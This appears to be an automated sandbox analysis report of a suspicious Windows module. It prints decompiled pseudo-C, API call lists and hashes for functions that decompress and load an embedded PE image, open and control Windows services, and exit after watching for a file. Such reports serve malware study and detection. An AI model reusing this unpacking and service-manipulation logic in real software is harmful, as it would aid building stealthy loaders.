				intOrPtr* _t111;
				void* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr _t157;
				intOrPtr* _t158;

				_t158 = __imp__CoCreateInstance;
				_push( &_v16);
				_push(0x6ecae08c);
				_push(1);
				_push(0);
				_push(0x6ecae0cc);
				_v12 = 0;
				_v4 = 0;
				_v16 = 0;
				if( *_t158() < 0) {
					L26:
					return _v32;
				}
				_t67 = _v36;
				_v40 = 0;
				_push( &_v40);
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
					L25:
					_t70 = _v44;
					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					if(_v36 != 0) {
						return 1;
					}
					goto L26;
				}
				_t73 = _v48;
				_v52 = 0;
				_push( &_v52);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
					L24:
					_t76 = _v56;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L25;
				} else {
					_t78 = _v60;
					_v44 = 0;
					_push( &_v44);
					_push(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
						_v48 = 1;
					}
					_t81 = _v68;
					_v72 = 0;
					_push( &_v72);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
						L23:
						_t84 = _v76;
						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
						goto L24;
					}
					_t154 = __imp__#2;
					_t151 =  *_t154(_v44, _t150, _t153);
					if(_t151 == 0) {
						L22:
						_t87 = _v84;
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
						goto L23;
					}
					_t89 = _v84;
					_push( &_v88);
					_v88 = 0;
					_push(_t151);
					_push(_t89);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
						if(_v64 != 0) {
							_t156 =  *_t154(_v56);
							if(_t156 != 0) {
								_push( &_v104);
								_push(0x6ecae05c);
								_push(1);
								_push(0);
								_push(0x6ecae0ac);
								if( *_t158() >= 0) {
									_t94 = _v124;
									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
									_t97 = _v132;
									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
									_t99 = _v136;
									_push(_v140);
									_push(_t99);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
										_v128 = 1;
									}
									_t102 = _v148;
									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
								}
								__imp__#6(_t156);
							}
						}
						L21:
						__imp__#6(_t151);
						goto L22;
					}
					_t157 = _v52;
					if(_t157 == 0) {
						_t108 = _v100;
						_v80 = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
						if(_v88 == 0) {
							_t111 = _v108;
							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
						}
					}
					_t104 = _v100;
					_v80 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
					if(_t157 != 0) {
						_t106 = _v100;
						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
					}
					goto L21;
				}
			}

0x6eca4a25
0x6eca4a2f
0x6eca4a30
0x6eca4a37
0x6eca4a39
0x6eca4a3a
0x6eca4a3f
0x6eca4a43
0x6eca4a47
0x6eca4a4f
0x6eca4c1d
0x00000000
0x6eca4c1d
0x6eca4a55
0x6eca4a5d
0x6eca4a63
0x6eca4a64
0x6eca4a6c
0x6eca4c06
0x6eca4c06
0x6eca4c10
0x6eca4c1b
0x6eca4c26
0x6eca4c26
0x00000000
0x6eca4c1b
0x6eca4a72
0x6eca4a7a
0x6eca4a80
0x6eca4a81
0x6eca4a89
0x6eca4bfa
0x6eca4bfa
0x6eca4c04
0x00000000
0x6eca4a8f
0x6eca4a8f
0x6eca4a97
0x6eca4a9d
0x6eca4a9e
0x6eca4aa6
0x6eca4aaf
0x6eca4aaf
0x6eca4ab7
0x6eca4abf
0x6eca4ac5
0x6eca4ac6
0x6eca4ace
0x6eca4bee
0x6eca4bee
0x6eca4bf8
0x00000000
0x6eca4bf8
0x6eca4ad9
0x6eca4ae3
0x6eca4ae7
0x6eca4be0
0x6eca4be0
0x6eca4bea
0x00000000
0x6eca4bed
0x6eca4aed
0x6eca4af5
0x6eca4af6
0x6eca4aff
0x6eca4b00
0x6eca4b05
0x6eca4b68
0x6eca4b71
0x6eca4b75
0x6eca4b7b
0x6eca4b7c
0x6eca4b81
0x6eca4b83
0x6eca4b84
0x6eca4b8d
0x6eca4b8f
0x6eca4b9a
0x6eca4b9c
0x6eca4ba7
0x6eca4ba9
0x6eca4bb3
0x6eca4bb4
0x6eca4bbc
0x6eca4bbe
0x6eca4bbe
0x6eca4bc6
0x6eca4bd0
0x6eca4bd0
0x6eca4bd3
0x6eca4bd3
0x6eca4b75
0x6eca4bd9
0x6eca4bda
0x00000000
0x6eca4bda
0x6eca4b07
0x6eca4b0d
0x6eca4b0f
0x6eca4b17
0x6eca4b22
0x6eca4b29
0x6eca4b2b
0x6eca4b37
0x6eca4b37
0x6eca4b29
0x6eca4b39
0x6eca4b43
0x6eca4b4b
0x6eca4b4f
0x6eca4b55
0x6eca4b60
0x6eca4b60
0x00000000
0x6eca4b4f

APIs

CoCreateInstance.OLE32(6ECAE0CC,00000000,00000001,6ECAE08C,?), ref: 6ECA4A4B
SysAllocString.OLEAUT32(?), ref: 6ECA4AE1
SysAllocString.OLEAUT32(?), ref: 6ECA4B6F
CoCreateInstance.OLE32(6ECAE0AC,00000000,00000001,6ECAE05C,?), ref: 6ECA4B89
SysFreeString.OLEAUT32(00000000), ref: 6ECA4BD3
SysFreeString.OLEAUT32(00000000), ref: 6ECA4BDA

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocCreateFreeInstance
String ID:
API String ID: 391255401-0
Opcode ID: 7a30cc5bde6d54b9645f975009aaf7a9823a2b668b93c5b02116b92c11a286a3
Instruction ID: 9c1189f4969d3ca7f27679098b4c3c5abb13bb0801f3b5b03850ef75df3604f1
Opcode Fuzzy Hash: 7a30cc5bde6d54b9645f975009aaf7a9823a2b668b93c5b02116b92c11a286a3
Instruction Fuzzy Hash: CC61C0B52047429FD700DF99D890E5AB7E9BBC8308F104A5CF659CB250EB31EC46CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2260, Relevance: 9.1, APIs: 6, Instructions: 84
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA2260(CHAR* _a4, long* _a8) {
				long _v4;
				long _v8;
				void* _t21;
				long _t27;
				intOrPtr* _t30;
				void* _t33;

				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t21 == 0xffffffff) {
					return 0;
				} else {
					_t27 = GetFileSize(_t21, 0);
					if(_t27 == 0) {
						return 0;
					} else {
						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
						if(_t33 == 0) {
							L6:
							return 0;
						} else {
							_v4 = 0;
							ReadFile(_t21, _t33, _t27,  &_v4, 0);
							CloseHandle(_t21);
							_v8 = 0;
							_t30 = E6ECA2190(_t33, _t27,  &_v8);
							VirtualFree(_t33, 0, 0x8000);
							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
								goto L6;
							} else {
								 *_a8 = _v8;
								return _t30;
							}
						}
					}
				}
			}

0x6eca2282
0x6eca2287
0x6eca2335
0x6eca228d
0x6eca2296
0x6eca229a
0x6eca232d
0x6eca22a0
0x6eca22af
0x6eca22b3
0x6eca231c
0x6eca2324
0x6eca22b5
0x6eca22bf
0x6eca22c7
0x6eca22ce
0x6eca22db
0x6eca22f3
0x6eca22f5
0x6eca22fd
0x00000000
0x6eca2309
0x6eca2315
0x6eca231b
0x6eca231b
0x6eca22fd
0x6eca22b3
0x6eca229a

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6ECA227C
GetFileSize.KERNEL32(00000000,00000000), ref: 6ECA2290
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6ECA22A9
ReadFile.KERNEL32 ref: 6ECA22C7
CloseHandle.KERNEL32(00000000), ref: 6ECA22CE

Part of subcall function 6ECA2190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA21BA
Part of subcall function 6ECA2190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6ECA21D1
Part of subcall function 6ECA2190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA21E5

VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA22F5

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
String ID:
API String ID: 3075244933-0
Opcode ID: 8dc8f2a639a2cd7b6601328b01a125ddc43356b89891f9825c6fcdc63d168528
Instruction ID: 976b4f5ee644e9e171a3bc424575327aad04f7d4a1b2f856d2765b19381bc560
Opcode Fuzzy Hash: 8dc8f2a639a2cd7b6601328b01a125ddc43356b89891f9825c6fcdc63d168528
Instruction Fuzzy Hash: 1421087520162167D6105AADAC48F8B7BACEBC6B26F104519FE14D3280E674D809CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2190, Relevance: 9.1, APIs: 6, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA2190(void* _a4, long _a8, intOrPtr* _a12) {
				long _v4;
				long _v8;
				intOrPtr* _v22;
				long _v30;
				intOrPtr _v42;
				intOrPtr _t18;
				long _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t37 = _a4;
				_t34 = _a8;
				_v8 = 0;
				_v4 = 0;
				do {
					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
					if(_t36 == 0) {
						goto L4;
					} else {
						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
							if(_t35 == 0) {
								break;
							} else {
								RtlMoveMemory(_t35, _t36, _v30);
								VirtualFree(_t36, 0, 0x8000);
								 *_v22 = _v42;
								return _t35;
							}
						} else {
							VirtualFree(_t36, 0, 0x8000);
							_t34 = _t34 + _t34;
							goto L4;
						}
					}
					L8:
					L4:
					_t18 = _v4 + 1;
					_v4 = _t18;
				} while (_t18 < 0x1e);
				 *_a12 = _v8;
				return 0;
				goto L8;
			}

0x6eca219b
0x6eca21a3
0x6eca21a7
0x6eca21ab
0x6eca21b0
0x6eca21bc
0x6eca21c0
0x00000000
0x6eca21c2
0x6eca21db
0x6eca221f
0x6eca2223
0x00000000
0x6eca2225
0x6eca222c
0x6eca2239
0x6eca2247
0x6eca2252
0x6eca2252
0x6eca21dd
0x6eca21e5
0x6eca21eb
0x00000000
0x6eca21eb
0x6eca21db
0x00000000
0x6eca21ed
0x6eca21f1
0x6eca21f2
0x6eca21f6
0x6eca2206
0x6eca220e
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA21BA
RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6ECA21D1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA21E5
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA221D
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6ECA222C
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6ECA2239

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree$BufferDecompressMemoryMove
String ID:
API String ID: 201667072-0
Opcode ID: 2910cdd43503f19165f755d35be2497173dc7798f1ae11c8d363db893b5a177d
Instruction ID: 6a4a52eff26348ee7b59b526878f104c9d2f07e2183670ebee57a56e0d6949e7
Opcode Fuzzy Hash: 2910cdd43503f19165f755d35be2497173dc7798f1ae11c8d363db893b5a177d
Instruction Fuzzy Hash: 4B21C0712443126BD310CE5ADC41F6BB7E9FBC9B15F100919FB94E7284EB60E8098BB6

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA38A0, Relevance: 9.1, APIs: 6, Instructions: 63
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6ECA38A0(char* _a4, char** _a8, int _a12, signed int _a16) {
				char* _t5;
				void* _t14;
				int _t19;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t19 = 0;
				_t5 = OpenSCManagerA(0, 0, 0xf003f);
				_t25 = _t5;
				if(_t25 != 0) {
					L2:
					_t27 = _a16;
					asm("sbb eax, eax");
					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
					if(_t24 == 0) {
						L6:
						CloseServiceHandle(_t25);
						goto L7;
					} else {
						if(_t27 != 0) {
							_t19 = 1;
							goto L6;
						} else {
							_t14 = E6ECA37D0(_t24, _a8, _a12);
							CloseServiceHandle(_t24);
							CloseServiceHandle(_t25);
							return _t14;
						}
					}
				} else {
					_t25 = OpenSCManagerA(_t5, _t5, 1);
					if(_t25 == 0) {
						L7:
						return _t19;
					} else {
						goto L2;
					}
				}
			}

0x6eca38ae
0x6eca38b2
0x6eca38b4
0x6eca38b8
0x6eca38c6
0x6eca38cb
0x6eca38d3
0x6eca38e8
0x6eca38ec
0x6eca3921
0x6eca3922
0x00000000
0x6eca38ee
0x6eca38f0
0x6eca391c
0x00000000
0x6eca38f2
0x6eca38fd
0x6eca3908
0x6eca390f
0x6eca391b
0x6eca391b
0x6eca38f0
0x6eca38ba
0x6eca38c0
0x6eca38c4
0x6eca392b
0x6eca392e
0x00000000
0x00000000
0x00000000
0x6eca38c4

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,6ECA709F,00000000,00000000,00000000,00000001,?,00000000), ref: 6ECA38B2
OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA38BE
OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6ECA38E2
CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6ECA3908
CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA390F
CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA3922

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandleOpen$Manager
String ID:
API String ID: 4196757001-0
Opcode ID: da6d93c04fe583403c1f73d8a3bff03e7a19c508d220a9016867422f4f29c20d
Instruction ID: 91fbbf2db755ee61ea764b323a4f91de2ecc1356d1669bdbb2863d4303d804a2
Opcode Fuzzy Hash: da6d93c04fe583403c1f73d8a3bff03e7a19c508d220a9016867422f4f29c20d
Instruction Fuzzy Hash: B601D6B2705E166BD6115ABC9C589BFB7ACDFC5765F040529FA10D3200EB65CC054AA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4FE0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6ECA4FE0(intOrPtr _a4) {
				char* _v0;
				char _v264;
				char _v272;
				char* _t9;
				int _t10;
				void* _t11;
				intOrPtr _t15;
				void* _t21;
				void* _t22;

				_t21 =  &_v264;
				_push(0x105);
				_push( &_v264);
				L6ECAC2EE();
				_t9 = _v0;
				if(_t9 == 0) {
					_t9 = M6ECB0530; // 0xcb2c98
				}
				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
				_t15 = _a4;
				_t22 = _t21 + 0xc;
				if(_t15 > 0) {
					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
					_t22 = _t22 + 0xc;
				}
				_t11 = M6ECB04D4; // 0x0
				_push(_t11);
				_push(0);
				_push(0);
				_push(0);
				return E6ECA4EF0( &_v264, 1, 0);
			}

0x6eca4fe0
0x6eca4fe6
0x6eca4fef
0x6eca4ff0
0x6eca4ff5
0x6eca4ffe
0x6eca5000
0x6eca5000
0x6eca5017
0x6eca5019
0x6eca5020
0x6eca5025
0x6eca5032
0x6eca5034
0x6eca5034
0x6eca5037
0x6eca503c
0x6eca503d
0x6eca503f
0x6eca5041
0x6eca505b

APIs

RtlZeroMemory.NTDLL(00000105,00000105), ref: 6ECA4FF0
wsprintfA.USER32 ref: 6ECA5017
wsprintfA.USER32 ref: 6ECA5032

Strings

w %d, xrefs: 6ECA502C
"%s", xrefs: 6ECA5011

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$MemoryZero
String ID: w %d$"%s"
API String ID: 3693688802-504233264
Opcode ID: 85d3d98dbc2e7c089377809ab09a0fa529f2fb3465d595addb7d48523805b0f4
Instruction ID: 40a854051188d1d510c59b6bd1caef70249ceb3452d64cdacec905af3f85f597
Opcode Fuzzy Hash: 85d3d98dbc2e7c089377809ab09a0fa529f2fb3465d595addb7d48523805b0f4
Instruction Fuzzy Hash: 9BF0C27161430167D624DA9CDD82FD777AC6B84704F004819BB84DB185FAB1E548CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECAC13A, Relevance: 7.5, APIs: 5, Instructions: 49
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECAC13A() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x6ecb0264; // 0x3322920a
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t32 == 0xbb40e64e || ( *0x6ecb0264 & 0xffff0000) == 0) {
						_t32 = 0xbb40e64f;
					}
					 *0x6ecb0264 = _t32;
					 *0x6ecb0268 =  !_t32;
					return _t22;
				} else {
					_t23 =  !_t14;
					 *0x6ecb0268 = _t23;
					return _t23;
				}
			}

0x6ecac142
0x6ecac147
0x6ecac14b
0x6ecac15d
0x6ecac171
0x6ecac17d
0x6ecac185
0x6ecac18d
0x6ecac199
0x6ecac1a2
0x6ecac1a5
0x6ecac1a9
0x6ecac1b3
0x6ecac1b3
0x6ecac1b8
0x6ecac1c0
0x00000000
0x6ecac163
0x6ecac163
0x6ecac165
0x00000000
0x6ecac165

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6ECAC171
GetCurrentProcessId.KERNEL32 ref: 6ECAC17D
GetCurrentThreadId.KERNEL32 ref: 6ECAC185
GetTickCount.KERNEL32 ref: 6ECAC18D
QueryPerformanceCounter.KERNEL32(?), ref: 6ECAC199

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 7639529dd4233c566d6d5de92c46a686d807db5966695d777e6105bf242187e1
Instruction ID: e2fe40860b3c750c21897cf8f771087b6fbaf271abbb5c003da94268fec01e8c
Opcode Fuzzy Hash: 7639529dd4233c566d6d5de92c46a686d807db5966695d777e6105bf242187e1
Instruction Fuzzy Hash: 2F015E72D00A169BDF109FECC64869EBBB4EF4A355F520552FA11EB204E6309944CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3A70, Relevance: 7.5, APIs: 5, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA3A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;

				_t9 = _a4 - 1;
				if(_t9 > 0xd) {
					L10:
					SetServiceStatus( *0x6ecb0394, 0x6ecb043c);
					return 0;
				}
				switch( *((intOrPtr*)(( *(_t9 + 0x6eca3b48) & 0x000000ff) * 4 +  &M6ECA3B34))) {
					case 0:
						 *0x6ecb0440 = 1;
						 *0x6ecb0448 = 0;
						 *0x6ecb0450 = 0;
						 *0x6ecb0454 = 0;
						goto L10;
					case 1:
						 *0x6ecb0440 = 7;
						goto L10;
					case 2:
						 *0x6ecb0440 = 4;
						goto L10;
					case 3:
						if(_a8 == 5) {
							_t13 = _a12;
							_t20 = _t19 | 0xffffffff;
							if(_t13 != 0) {
								_t20 =  *(_t13 + 4);
							}
							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
							if(_t15 != 0) {
								 *_t15 = _t20;
								CloseHandle(CreateThread(0, 0, E6ECA3930, _t15, 0, 0));
							}
						}
						goto L10;
					case 4:
						goto L10;
				}
			}

0x6eca3a74
0x6eca3a79
0x6eca3b1a
0x6eca3b26
0x6eca3b2f
0x6eca3b2f
0x6eca3a86
0x00000000
0x6eca3af2
0x6eca3afc
0x6eca3b06
0x6eca3b10
0x00000000
0x00000000
0x6eca3ada
0x00000000
0x00000000
0x6eca3ae6
0x00000000
0x00000000
0x6eca3a92
0x6eca3a98
0x6eca3a9c
0x6eca3aa1
0x6eca3aa3
0x6eca3aa3
0x6eca3ab1
0x6eca3ab9
0x6eca3ac9
0x6eca3ad2
0x6eca3ad2
0x6eca3ab9
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000004), ref: 6ECA3AAA
HeapAlloc.KERNEL32(00000000), ref: 6ECA3AB1
CreateThread.KERNEL32 ref: 6ECA3ACB
CloseHandle.KERNEL32(00000000), ref: 6ECA3AD2
SetServiceStatus.ADVAPI32(00000000,6ECB043C), ref: 6ECA3B26

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
String ID:
API String ID: 3654718518-0
Opcode ID: b0220c7f68287f12eb2d1a9d569d581eab112dc617a3e8cb8c9aa9cca7356dca
Instruction ID: 67af5ebd7399c65f168ef762b87dabcb2a5b59584c293938118725543cdfd030
Opcode Fuzzy Hash: b0220c7f68287f12eb2d1a9d569d581eab112dc617a3e8cb8c9aa9cca7356dca
Instruction Fuzzy Hash: CE112770244A12EFEB109F9C9B2EB5E3BB5BB42318F014508FA559F1C0E774E8458F11

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2340, Relevance: 7.5, APIs: 5, Instructions: 34
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA2340(intOrPtr* _a4) {
				intOrPtr* _t15;

				Sleep(0xbb8);
				_t15 = _a4;
				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
					do {
						Sleep(0x7d0);
					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff);
					E6ECA1C00(_t15);
					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
					 *(_t15 + 0x24) = 0;
					ExitProcess(0);
				}
				return 0;
			}

0x6eca234d
0x6eca234f
0x6eca2356
0x6eca2365
0x6eca236a
0x6eca2372
0x6eca2378
0x6eca238b
0x6eca2393
0x6eca239a
0x6eca239a
0x6eca23a5

APIs

Sleep.KERNEL32(00000BB8), ref: 6ECA234D
Sleep.KERNEL32(000007D0), ref: 6ECA236A
GetFileAttributesA.KERNEL32(00000000), ref: 6ECA2370
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6ECA238B
ExitProcess.KERNEL32 ref: 6ECA239A

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep$AttributesExitFileFreeProcessVirtual
String ID:
API String ID: 4254501734-0
Opcode ID: 094cf10c9fee4891e48dd1cee0425b2b980cc0af15e12f68584b19580f881a2d
Instruction ID: 54d218623c0fd3ca553816e696cec8d28146529676d98d0bfee06c1bcc1d206e
Opcode Fuzzy Hash: 094cf10c9fee4891e48dd1cee0425b2b980cc0af15e12f68584b19580f881a2d
Instruction Fuzzy Hash: 43F09A31600A11ABD750ABAECE84B8BB7B8BF4A738F110919F796931C0D7B0A440CE65

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA2D55, Relevance: 7.5, APIs: 5, Instructions: 34
sleepwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA2D55() {
				struct HWND__* _t1;
				int _t3;
				void* _t7;

				if(_t1 != 0) {
					_t3 = IsWindow(_t1);
					_t1 =  *0x6ecb0398; // 0x0
					if(_t3 != 0) {
						PostMessageA(_t1, 0x10, 0, 0);
						_t1 =  *0x6ecb0398; // 0x0
					}
				}
				_t7 = 0;
				while(_t1 != 0 && IsWindow(_t1) != 0) {
					Sleep(0x3e8);
					_t7 = _t7 + 1;
					if(_t7 < 0xa) {
						_t1 =  *0x6ecb0398; // 0x0
						continue;
					}
					break;
				}
				ExitProcess(0);
			}

0x6eca2d60
0x6eca2d63
0x6eca2d67
0x6eca2d6c
0x6eca2d75
0x6eca2d7b
0x6eca2d7b
0x6eca2d6c
0x6eca2d86
0x6eca2d95
0x6eca2da5
0x6eca2da7
0x6eca2dab
0x6eca2d90
0x00000000
0x6eca2d90
0x00000000
0x6eca2dab
0x6eca2daf

APIs

IsWindow.USER32 ref: 6ECA2D63
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 6ECA2D75
IsWindow.USER32 ref: 6ECA2D9A
Sleep.KERNEL32(000003E8), ref: 6ECA2DA5
ExitProcess.KERNEL32 ref: 6ECA2DAF

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ExitMessagePostProcessSleep
String ID:
API String ID: 1225241566-0
Opcode ID: 11306c0213ff53abd55861bdd59dab88ef31960ddb0e14712086c74cd72d7f93
